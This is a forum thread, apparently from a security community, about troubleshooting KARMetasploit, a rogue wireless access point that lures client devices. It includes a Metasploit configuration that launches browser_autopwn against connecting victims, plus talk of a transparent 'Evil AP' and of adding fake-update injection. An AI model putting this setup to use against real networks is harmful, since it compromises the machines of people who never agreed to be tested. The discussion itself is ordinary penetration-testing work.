You can get support for KARMetasploit via http://metasploit.com/dev/trac/wiki/Karmetasploit
I have been trying to get KARMetasploit to work and I have one problem.
I can get everything up and running and I can see that dhcpd is offering a Windows XP client an IP with a DHCPOFFER. The problem is that the XP client does not send any DHCPACK back to the dhcpd service.
I have read a lot on Google and found that this is a Windows "bug" that could be corrected on the Windows client. I do not want that solution because then KARMetasploit would be quite useless.
So I found another solution on Google:
route add -host 255.255.255.255 dev at0
I tried it and I still don't get any IP. Do you have any other ideas?
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
You can also send the developer an email or catch him on the (freenode) IRC channel - #remote-exploit. His handle is 'hdm', and he is a pretty nice guy when it comes to helping with matters similar to this.
dd if=/dev/swc666 of=/dev/wyze
The only difference from the main page is the karma.rc being used. Specifically this set of lines:
Gets the info it needs and crashes the browser. I had the same result with Firefox 3.0.1 and IE 7.
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
Taking those lines away keeps the user on. The only thing I have left is configuring the proxy and/or DNS. I'm trying to figure out the part I missed to route the user to my WAN to keep the illusion going.
Yes, it is possible to have fully transparent Karmetasploit keeping the illusion perfect. You need to set up a bridge between your fake AP and another internet connection. I have gotten this to work on my old hardware but I just got my brand new laptop yesterday and have been trying to get it up and running again.
You need to be careful though because it takes some decent hardware to do this properly as your computer has to pretend it is a router and if you have multiple clients trying to connect to it trying to get large amounts of internet data it can crash an older system in seconds.
I have written a small tutorial for my own personal use to get everything up and running on my specific hardware, and I am toying around with the idea of releasing it and perhaps a video showing how to get a transparent Evil AP up and running. I think I will wait until I integrate Evilgrade with Karmetasploit dubbed "BadKarma" (which is this week's project) and then do a nice polished release by the end of the week if anyone is interested.
Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."
Neo: "What if I take both?"
Morpheus: "Don't do that! You end up like Nick Nolte!"
>> 2.) i AM interested !! in both - the routing AND the BADKARMA.
greets, bracer ace